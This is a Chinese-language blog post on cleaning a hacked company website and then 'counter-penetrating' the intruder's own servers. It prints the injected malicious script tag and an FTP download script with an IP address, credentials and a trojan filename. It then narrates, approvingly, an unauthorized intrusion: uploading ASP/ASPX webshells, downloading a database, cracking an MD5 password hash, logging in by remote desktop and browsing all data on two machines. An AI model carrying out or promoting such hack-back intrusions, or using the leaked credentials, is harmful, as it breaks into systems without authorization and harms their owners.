網絡維護過程中的滲透與反滲透

<b></b>

<b>網絡維護過程中的滲透與反滲透</b>

<b>simeon</b>

我的一個朋友告訴我，說他們在通路自己公司網站時，出來一大堆東西，而且防毒軟體還提示網頁存在病毒， 我的第一感覺就是公司伺服器被人入侵了。

（一）網站挂馬檢測和清除

1.使用軟體嗅探被挂馬頁面

朋友将遠端終端和公司網站名稱告訴我後，我首先在虛拟機中使用URLSnooper軟體對網站進行嗅探，果然網站多處檔案被人挂馬，如圖1所示。登陸遠端終端後，一看其伺服器配置較高，帶寬是20M光纖，通路網絡的速度非常快，覺得是高品質殭屍電腦的首選，也難怪被人黑。

圖1 使用URLSnooper監聽網站所有連結和通路

說明：

（1）URLSnooper是一款安全檢查工具，就其名稱意義就知道該軟體是URL監視，個人感覺是一款捕捉網站是否挂馬的好程式。URLSnooper安裝比較簡單，安裝完畢後需要安裝預設的抓包軟體。

（2）确認網站被人挂馬後，首先将網站檔案進行了備份。

直接到網站根目錄檢視網站檔案的最近的一些修改時間，從首頁更改的時間為8月25日，是以可以借助系統的檔案搜尋功能搜尋2008年8月24日至8月26日之間的檔案，如圖2所示，搜尋出來好幾十個檔案，被修改檔案很有特點，index.html、index.asp、conn.asp、top.asp、foot.asp以及js檔案均被修改，從檔案中可以看出該挂馬人絕對是一個團夥或者是一個老手，他不是對所有檔案進行挂馬，而是有針對性的對一個關鍵檔案進行挂馬。

圖2 查找被修改的網站檔案

2.清除挂馬代碼

在所有檔案中查找代碼“&lt;script src=http://%61%76%65%31%2E%63%6E&gt;&lt;/script&gt;”将其清除。

（二）系統入侵痕迹搜尋和整理

1.檢視入侵者遺留在系統中的痕迹

對系統目錄以及伺服器所有目錄進行檔案檢視，發現該入侵者使用過“1433全自動掃描傳馬工具”。通過對該工具軟體的研究分析，該掃描工具中需要有配置檔案，用來下載下傳木馬。果不其然，在系統目錄下發現有一個檔案cc1.txt生成日期是2008年5月29日，大小隻有64個位元組，用type指令顯示如下：

<b>open 122.138.14.8</b>

<b>gusdn</b>

<b>lixuanyu</b>

<b>binary</b>

<b>get 1.exe</b>

<b>bye</b>

該檔案是FTP自動下載下傳的配置資訊，直接使用CuteFTP軟體進行ftp登陸嘗試，填好IP位址和帳号密碼，順利登入如圖3所示！從伺服器上的東西不難看出，這台機器的FTP路徑是Windows系統某個磁盤的根目錄，裡面有不少黑客用的工具，機主肯定是一個入侵者或者安全愛好者。

圖3 成功登陸Ftp伺服器

很多入侵者在利用網上下載下傳的工具時，沒有很好地設定和改造，隻是進行簡單的配置後，便開始攻擊和入侵。是以，在肉機上經常留下各種木馬的安裝檔案，有時甚至還有FTP自動上傳檔案的配置檔案。可以使用“dir /od /a” 指令檢視目前目錄中的檔案，如果存在小于100位元組的檔案，則這些檔案極有可能為配置檔案。

用掃描工具軟體檢視以下該計算機開放哪些端口，如圖4所示，系統開放了80端口和遠端終端服務3389端口。

圖4 檢視遠端伺服器開放端口

（三）利用社會工程學進行反滲透

1.使用擷取的Ftp賬号猜測服務登陸密碼

既然在伺服器上面開放了3389端口、Ftp服務，那麼可以嘗試利用FTP的帳号和密碼登入它的3389遠端桌面，猜測administrator的密碼，結果不是gusdn，也不是lixuanxu，說明使用Ftp賬号和密碼不能進入系統，換一個思路。

2.從網站入手

接下來，使用IE浏覽器打開該IP位址，可以正常通路網站，該服務提供了Web服務，網站為遊戲私服伺服器，如圖5所示，通過HDSI以及Domain3.5等SQL注入工具對網站進行了探測，未找到可以利用的地方。

圖5 伺服器提供web服務

3.從Ftp目錄入手

猛然想起在FTP的目錄中有一個web子目錄，會不會與網站有關系呢？先上傳個asp木馬到web目錄試試。不試不知道，一試吓一跳，這個目錄居然正是網站的根目錄， asp小馬可以正常運作，如圖6所示，通過asp木馬在網站中看了看，發現可以浏覽所有磁盤，不過隻有D盤有寫權限。經過與FTP中的檔案進行對比，FTP的根目錄也就是D盤。

圖6 上傳Asp木馬

好了，現在既可以上傳檔案，也可以浏覽檔案。要想提升權限，還必須要能執行指令。我上傳了一個asp的cmd木馬到web目錄，結果竟然不能執行。繼續利用asp木馬在機器上找找其它的突破口，結果一無所獲。FTP不是用Serv-U開的，C槽不可寫，不能執行指令，怎麼辦？

4.上傳Asp.net木馬提升系統權限

忽然想起用3389登入這台機器時，它的作業系統是2003，可能支援asp.net，我為什麼不上傳個aspx的CMD的木馬試試。說幹就幹。果然，aspx木馬能執行指令了，如圖7所示。檢視機器的使用者清單，居然沒有administrator卻有個xuanyu，而FTP的密碼是lixuanyu，一定是管理者把超級使用者改名過來的。它的密碼會是什麼呢？還是用3389登入器測試一番，不是gusdn，不是lixuanyu，更不是12345678，猜不出來了。

圖7 使用asp.net木馬檢視系統管理者賬号

5.擷取資料庫使用者管理者密碼

按照密碼設定習慣，入侵者極有可能使用了相同密碼，是以可以嘗試擷取資料庫中使用者的密碼來登陸遠端終端伺服器。使用CuteFtp對整個網站目錄中的檔案進行檢視，在TT目錄中發現資料庫檔案“$_$%●yingzi!#%&amp;^$#.asa”，使用FTP下載下傳回來後，把檔案的字尾改為mdb，使用access直接打開該資料庫，如圖8所示，從中找到管理者使用的表Gq_Admin。

如圖8所示，擷取管理者表Gq_Admin

從表Gq_Admin中發現存在gusdn使用者，并且是個進階管理者，他的密碼用MD5加密後是5334e6dd7b8exxxx。趕緊打開網頁[url]www.cmd5.com[/url]，填好16位密碼，解密！ Ok，不到1分鐘密碼出來了，12703XXX，如圖9所示。

圖9 擷取使用者的密碼

6.再次登陸遠端終端

直接打開遠端終端連接配接器，在其中輸入使用者名“xuanyu”，密碼“12703XXX”，然後單擊“連接配接”，很快成功進入該計算機，如圖10所示。

圖10 成功進入入侵者計算機伺服器

7.檢視入侵者伺服器

使用systeminfo工具檢視系統的詳細情況：

Systeminfo

Default Domain:   KIRY-C1AEF31B8B

IP  Address:      122.138.14.8

Computer Name:    KIRY-C1AEF31B8B

Current UserName: xuanyu

Update Time:      0 day 22 Hour 43 Min 57 Sec

Total Memory:     1015 MB

Free Memory:      682 MB

CPU Speed:        2.7 GHz

Cpu Number:       2

Termsrv Port:     (3389,3389)

Language:         Chinese (PRC)

Operate System:   WIN2003

Window Directory: C:\WINDOWS

System Directory: C:\WINDOWS\system32

Hard Disk: C:\ (NTFS) Total 9.77 Gb, Free  4.02 Gb.

Hard Disk: D:\ (NTFS) Total 29.29 Gb,  Free 26.86 Gb.

Hard Disk: E:\ (NTFS) Total 31.81 Gb,  Free 27.74 Gb.

    幾天後，這台機器的FTP服務沒有了，網站也從122.138.14.8搬到了122.138.14.4，并且隻能用域名[url]www.sow2i.com[/url]來登入了。不過，它們的3389還都是有的，而且兩台機器的帳号和密碼都是一樣的。這樣，成功滲透第二台計算機，在計算機上面給了一個警告，呵呵，當然徹底的檢視了該計算機上面的所有資料。

（四）總結

網絡安全與維護是攻擊與防護的對立統一，好的攻擊就是好的防護，從挂馬的計算機中中擷取的痕迹，反過來滲透到入侵者的計算機，也不是不可能的事情。回想反滲透入侵者的伺服器過程中，突破口隻是一個FTP密碼，接下來從網頁木馬到資料庫下載下傳，從MD5的管理者密碼到主機使用者密碼，最後實作了3389的遠端桌面登入。整個過程并沒有多少技術含量，就是因為入侵者的疏忽大意，結果被反滲透！是以在網絡管理與維護過程中，碰到問題不要害怕，仔細分析，合理利用每一個掌握的資訊，極有可能發生意想不到的事情，讓我們在網絡維護過程中享受工作的樂趣。

 本文轉自 simeon2005 51CTO部落格，原文連結:http://blog.51cto.com/simeon/100465